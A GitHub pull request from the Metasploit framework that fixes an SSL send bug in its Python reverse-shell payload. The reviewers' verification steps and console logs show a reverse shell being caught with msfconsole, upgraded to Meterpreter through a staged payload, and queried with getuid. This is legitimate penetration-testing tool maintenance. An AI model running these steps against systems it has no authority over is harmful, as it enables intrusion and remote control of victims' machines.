New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Fixed python reverse shell ssl send for EOF occurred in violation of … #6897

Merged
merged 2 commits into from May 21, 2016

Conversation

Projects
None yet
5 participants
@geckom
Contributor

geckom commented May 20, 2016

Fixes "ssl.SSLEOFError: EOF occurred in violation of protocol" when trying to upgrade a python/shell_reverse_tcp_ssl payload.

Updated "send" function to "sendall" - Unlike send(), this method continues to send data from string until either all data has been sent or an error occurs.

Verification

Tested meterpreter upgrade of shell and normal shell commands.

  • Start msfconsole
  • use exploit/multi/handler
  • set PAYLOAD=python/shell_reverse_tcp_ssl
  • exploit -j -z
    Command shell session 192 opened (4.3.2.1:54321 -> 1.2.3.4:12345) at 2016-05-06 00:11:22 +0000
  • sessions
    192 shell python 4.3.2.1:54321 -> 1.2.3.4:12345
  • sessions -i 192
  • ls /tmp
    mysql.sock
    Background session 192? [y/N] y
  • sessions -u 192
    [] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [192]
    [*] Upgrading session ID: 192
    [
    ] Starting exploit/multi/handler
    [] Started reverse TCP handler on 4.3.2.1:54321
    [
    ] Starting the payload handler...
    [] Sending stage (38526 bytes) to 1.2.3.4
    [
    ] Meterpreter session 194 opened (4.3.2.1:54321 -> 1.2.3.4:12345) at 2016-05-06 00:11:22 +0000

@zeroSteiner

@zeroSteiner zeroSteiner self-assigned this May 20, 2016

@sempervictus

This comment has been minimized.

Show comment
Hide comment
@sempervictus

sempervictus May 20, 2016

Contributor

Thank you, testing now.

Contributor

sempervictus commented May 20, 2016

Thank you, testing now.

@zeroSteiner

This comment has been minimized.

Show comment
Hide comment
@zeroSteiner

zeroSteiner May 21, 2016

Contributor

So fun fact about this error is that I'm able to reproduce it reliably by simply trying to interact with the shell on my system. That is to say that without even trying to upgrade the shell to a meterpreter session as outlined in the description, it is dying with the following error:

Traceback (most recent call last):
  File "<string>", line 1, in <module>
  File "<string>", line 12, in <module>
  File "/usr/lib64/python2.7/ssl.py", line 687, in send
    v = self._sslobj.write(data)
ssl.SSLEOFError: EOF occurred in violation of protocol (_ssl.c:1646)

Python version 2.7.11 on Linux x64

Contributor

zeroSteiner commented May 21, 2016

So fun fact about this error is that I'm able to reproduce it reliably by simply trying to interact with the shell on my system. That is to say that without even trying to upgrade the shell to a meterpreter session as outlined in the description, it is dying with the following error:

Traceback (most recent call last):
  File "<string>", line 1, in <module>
  File "<string>", line 12, in <module>
  File "/usr/lib64/python2.7/ssl.py", line 687, in send
    v = self._sslobj.write(data)
ssl.SSLEOFError: EOF occurred in violation of protocol (_ssl.c:1646)

Python version 2.7.11 on Linux x64

@zeroSteiner

This comment has been minimized.

Show comment
Hide comment
@zeroSteiner

zeroSteiner May 21, 2016

Contributor

Was able to confirm that this addresses the EOF error and there are no apparent version restrictions on Pythons sendall function. Thanks @geckom, I'll have this landed in just a minute.

msf (S:1 J:0) exploit(handler) > sessions -u 1 
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] [2016.05.21-16:44:51] Upgrading session ID: 1
[*] [2016.05.21-16:44:52] Platform: Linux
[*] [2016.05.21-16:44:52] Upgrade payload: linux/x86/meterpreter/reverse_tcp
[*] [2016.05.21-16:44:52] Starting exploit/multi/handler
[*] [2016.05.21-16:44:52] Started reverse TCP handler on 192.168.90.1:4433 
[*] [2016.05.21-16:44:52] Starting the payload handler...
[*] [2016.05.21-16:44:57] Transfer method: Bourne shell [fallback]
[*] [2016.05.21-16:44:57] Starting transfer...
[*] [2016.05.21-16:44:57] Transmitting intermediate stager for over-sized stage...(105 bytes)
[*] [2016.05.21-16:44:59] Sending stage (1495599 bytes) to 192.168.90.1
[*] [2016.05.21-16:44:59] Command stager progress: 100.00% (668/668 bytes)
[*] [2016.05.21-16:44:59] Cleaning up handler
msf (S:1 J:1) exploit(handler) > [*] Meterpreter session 2 opened (192.168.90.1:4433 -> 192.168.90.1:57092) at 2016-05-21 16:45:01 -0400

msf (S:2 J:0) exploit(handler) > 
msf (S:2 J:0) exploit(handler) > sessions -i

Active sessions
===============

  Id  Type                   Information                                                                       Connection
  --  ----                   -----------                                                                       ----------
  1   shell python                                                                                             192.168.90.1:4444 -> 192.168.90.1:48008 (192.168.90.1)
  2   meterpreter x86/linux  uid=1000, gid=1000, euid=1000, egid=1000, suid=1000, sgid=1000 @ localhost.lo...  192.168.90.1:4433 -> 192.168.90.1:57092 (192.168.90.1)

msf (S:2 J:0) exploit(handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: uid=1000, gid=1000, euid=1000, egid=1000, suid=1000, sgid=1000
meterpreter >
Contributor

zeroSteiner commented May 21, 2016

Was able to confirm that this addresses the EOF error and there are no apparent version restrictions on Pythons sendall function. Thanks @geckom, I'll have this landed in just a minute.

msf (S:1 J:0) exploit(handler) > sessions -u 1 
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] [2016.05.21-16:44:51] Upgrading session ID: 1
[*] [2016.05.21-16:44:52] Platform: Linux
[*] [2016.05.21-16:44:52] Upgrade payload: linux/x86/meterpreter/reverse_tcp
[*] [2016.05.21-16:44:52] Starting exploit/multi/handler
[*] [2016.05.21-16:44:52] Started reverse TCP handler on 192.168.90.1:4433 
[*] [2016.05.21-16:44:52] Starting the payload handler...
[*] [2016.05.21-16:44:57] Transfer method: Bourne shell [fallback]
[*] [2016.05.21-16:44:57] Starting transfer...
[*] [2016.05.21-16:44:57] Transmitting intermediate stager for over-sized stage...(105 bytes)
[*] [2016.05.21-16:44:59] Sending stage (1495599 bytes) to 192.168.90.1
[*] [2016.05.21-16:44:59] Command stager progress: 100.00% (668/668 bytes)
[*] [2016.05.21-16:44:59] Cleaning up handler
msf (S:1 J:1) exploit(handler) > [*] Meterpreter session 2 opened (192.168.90.1:4433 -> 192.168.90.1:57092) at 2016-05-21 16:45:01 -0400

msf (S:2 J:0) exploit(handler) > 
msf (S:2 J:0) exploit(handler) > sessions -i

Active sessions
===============

  Id  Type                   Information                                                                       Connection
  --  ----                   -----------                                                                       ----------
  1   shell python                                                                                             192.168.90.1:4444 -> 192.168.90.1:48008 (192.168.90.1)
  2   meterpreter x86/linux  uid=1000, gid=1000, euid=1000, egid=1000, suid=1000, sgid=1000 @ localhost.lo...  192.168.90.1:4433 -> 192.168.90.1:57092 (192.168.90.1)

msf (S:2 J:0) exploit(handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: uid=1000, gid=1000, euid=1000, egid=1000, suid=1000, sgid=1000
meterpreter >

@zeroSteiner zeroSteiner merged commit a71e853 into rapid7:master May 21, 2016

1 check passed

continuous-integration/travis-ci/pr The Travis CI build passed
Details

zeroSteiner added a commit that referenced this pull request May 21, 2016

@OJ

This comment has been minimized.

Show comment
Hide comment
@OJ

OJ May 21, 2016

Contributor

Nice job. Thanks @geckom for the contribution!

Contributor

OJ commented May 21, 2016

Nice job. Thanks @geckom for the contribution!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment